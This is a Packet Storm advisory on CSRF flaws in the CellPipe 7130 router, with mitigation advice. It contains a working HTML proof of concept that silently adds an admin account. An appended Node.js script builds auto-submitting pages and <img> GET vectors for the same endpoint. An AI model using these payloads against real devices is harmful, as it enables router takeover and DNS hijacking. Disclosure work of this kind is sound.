Packet Storm advisory PACKETSTORM:132324
CellPipe 7130 Cross Site Request Forgery
Author: Dionisia Lerataki
Published: 2015-06-16 (packetstormsecurity.com)
EPSS: 0.002 (percentile 55.6%)

CellPipe Router CSRF vulnerability

Device model: CellPipe 7130 RG 5Ae. M2013 HOL
Software Version: 1.0.0.20h.HOL
CWE: 352 - https://cwe.mitre.org/data/definitions/352.html
CVE: CVE-2015-4586
Date: 16/06/2015
Discovered by: Dionisia Lerataki
(https://gr.linkedin.com/pub/dionisia-lerataki/88/18/891)


Vulnerability type: Multiple CSRF vulnerabilities in the router's web
interface

CSRF (Cross Site Request Forgery) is an attack which forces an end user to
execute unwanted actions on a web application in which they are currently
authenticated: the victim's browser attaches the application's session
cookie to a request that an attacker's page triggers, and the application
cannot distinguish it from a request the user intended. It is currently
included in the OWASP Top 10 project.
  
Exploitation and Impact:

Exploiting the above vulnerabilities, combined with a social engineering
attack that lures a logged-in administrator to an attacker-controlled page,
may lead to:

• Unwanted service exposure
• DNS hijacking
• Disabling wireless security
• User account creation

I have tested the user account creation scenario and the proof of concept
is the following:
  
<html>
<body>
<!-- The form has no method attribute, so the browser submits it as a GET:
     http://192.168.1.1/password.cmd?action=add_user&userAdd=csrf&pwdAdd=csrf
     The victim's browser attaches the router session cookie by itself. -->
<form action="http://192.168.1.1/password.cmd">
<input type="hidden" name="action" value="add_user" />
<input type="hidden" name="userAdd" value="csrf" />
<input type="hidden" name="pwdAdd" value="csrf" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
  
If a router administrator who is logged in to the web interface opens the
above page and submits the form, a user with credentials csrf/csrf is added.
In our PoC the administrator must press "Submit request", but in a real
attack scenario the attacker can auto-submit the form with JavaScript so
that merely loading the page triggers the request; and because the form is
sent as a GET, a single <img> tag pointing at the same URL is also enough.

In our case the router's LAN IP address is 192.168.1.1. The same request
can be sent to the router's public IP address if the web interface is
reachable from the WAN side.
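The auto-submitting variant mentioned above, as an added example that is not part of the original advisory: a small Node.js script that generates the attacker's page for the password.cmd endpoint and, since the endpoint accepts GET, the equivalent single-URL vector. The target URL and field values are the advisory's; the helper names (buildAutoSubmitPage, buildGetUrl, buildImgVector) are this example's own.

```javascript
// Added example (not from the original advisory): builds an auto-submitting
// CSRF page for the password.cmd endpoint, so the victim only has to load it.
// Target and field values come from the advisory's PoC; helper names are ours.
const TARGET = "http://192.168.1.1/password.cmd";
const FIELDS = { action: "add_user", userAdd: "csrf", pwdAdd: "csrf" };

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// An HTML page whose form is submitted by script as soon as it loads; the
// victim's browser attaches the router session cookie by itself. The method
// defaults to GET, matching the advisory's form (which has no method attribute).
function buildAutoSubmitPage(target, fields, method = "GET") {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}" />`)
    .join("\n");
  return [
    "<html><body>",
    `<form id="csrf" action="${escapeAttr(target)}" method="${method}">`,
    inputs,
    "</form>",
    "<script>document.getElementById('csrf').submit();</script>",
    "</body></html>",
  ].join("\n");
}

// Because the vulnerable endpoint honours GET, the whole request fits in a
// URL: any element that triggers a fetch (<img>, <link>, ...) is enough,
// with no JavaScript at all.
function buildGetUrl(target, fields) {
  return `${target}?${new URLSearchParams(fields).toString()}`;
}

function buildImgVector(target, fields) {
  return `<img src="${escapeAttr(buildGetUrl(target, fields))}" alt="" />`;
}

console.log(buildAutoSubmitPage(TARGET, FIELDS));
console.log(buildImgVector(TARGET, FIELDS));
```

Run with `node csrf-page.js` and host the printed HTML on any origin; the GET URL is the same one the advisory's form produces when the administrator presses "Submit request".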
  
Suggested mitigation:

In order to properly patch the CSRF vulnerability the following measures
have to be taken:

• Add a randomly generated token, bound to the user's session, to every
state-changing form and reject any request that does not carry the correct
token (compare it in constant time).
• Accept state-changing actions such as password.cmd only over POST; the PoC
works with a plain GET, so today the request can be triggered by an <img>
tag without any script.
• Alternatively, or in addition, check the Origin or Referer header. A page
on another site cannot set these headers in the victim's browser, so the
check does stop this kind of attack; but browsers and proxies sometimes
strip Referer, so a request that carries neither header must be rejected
rather than allowed through.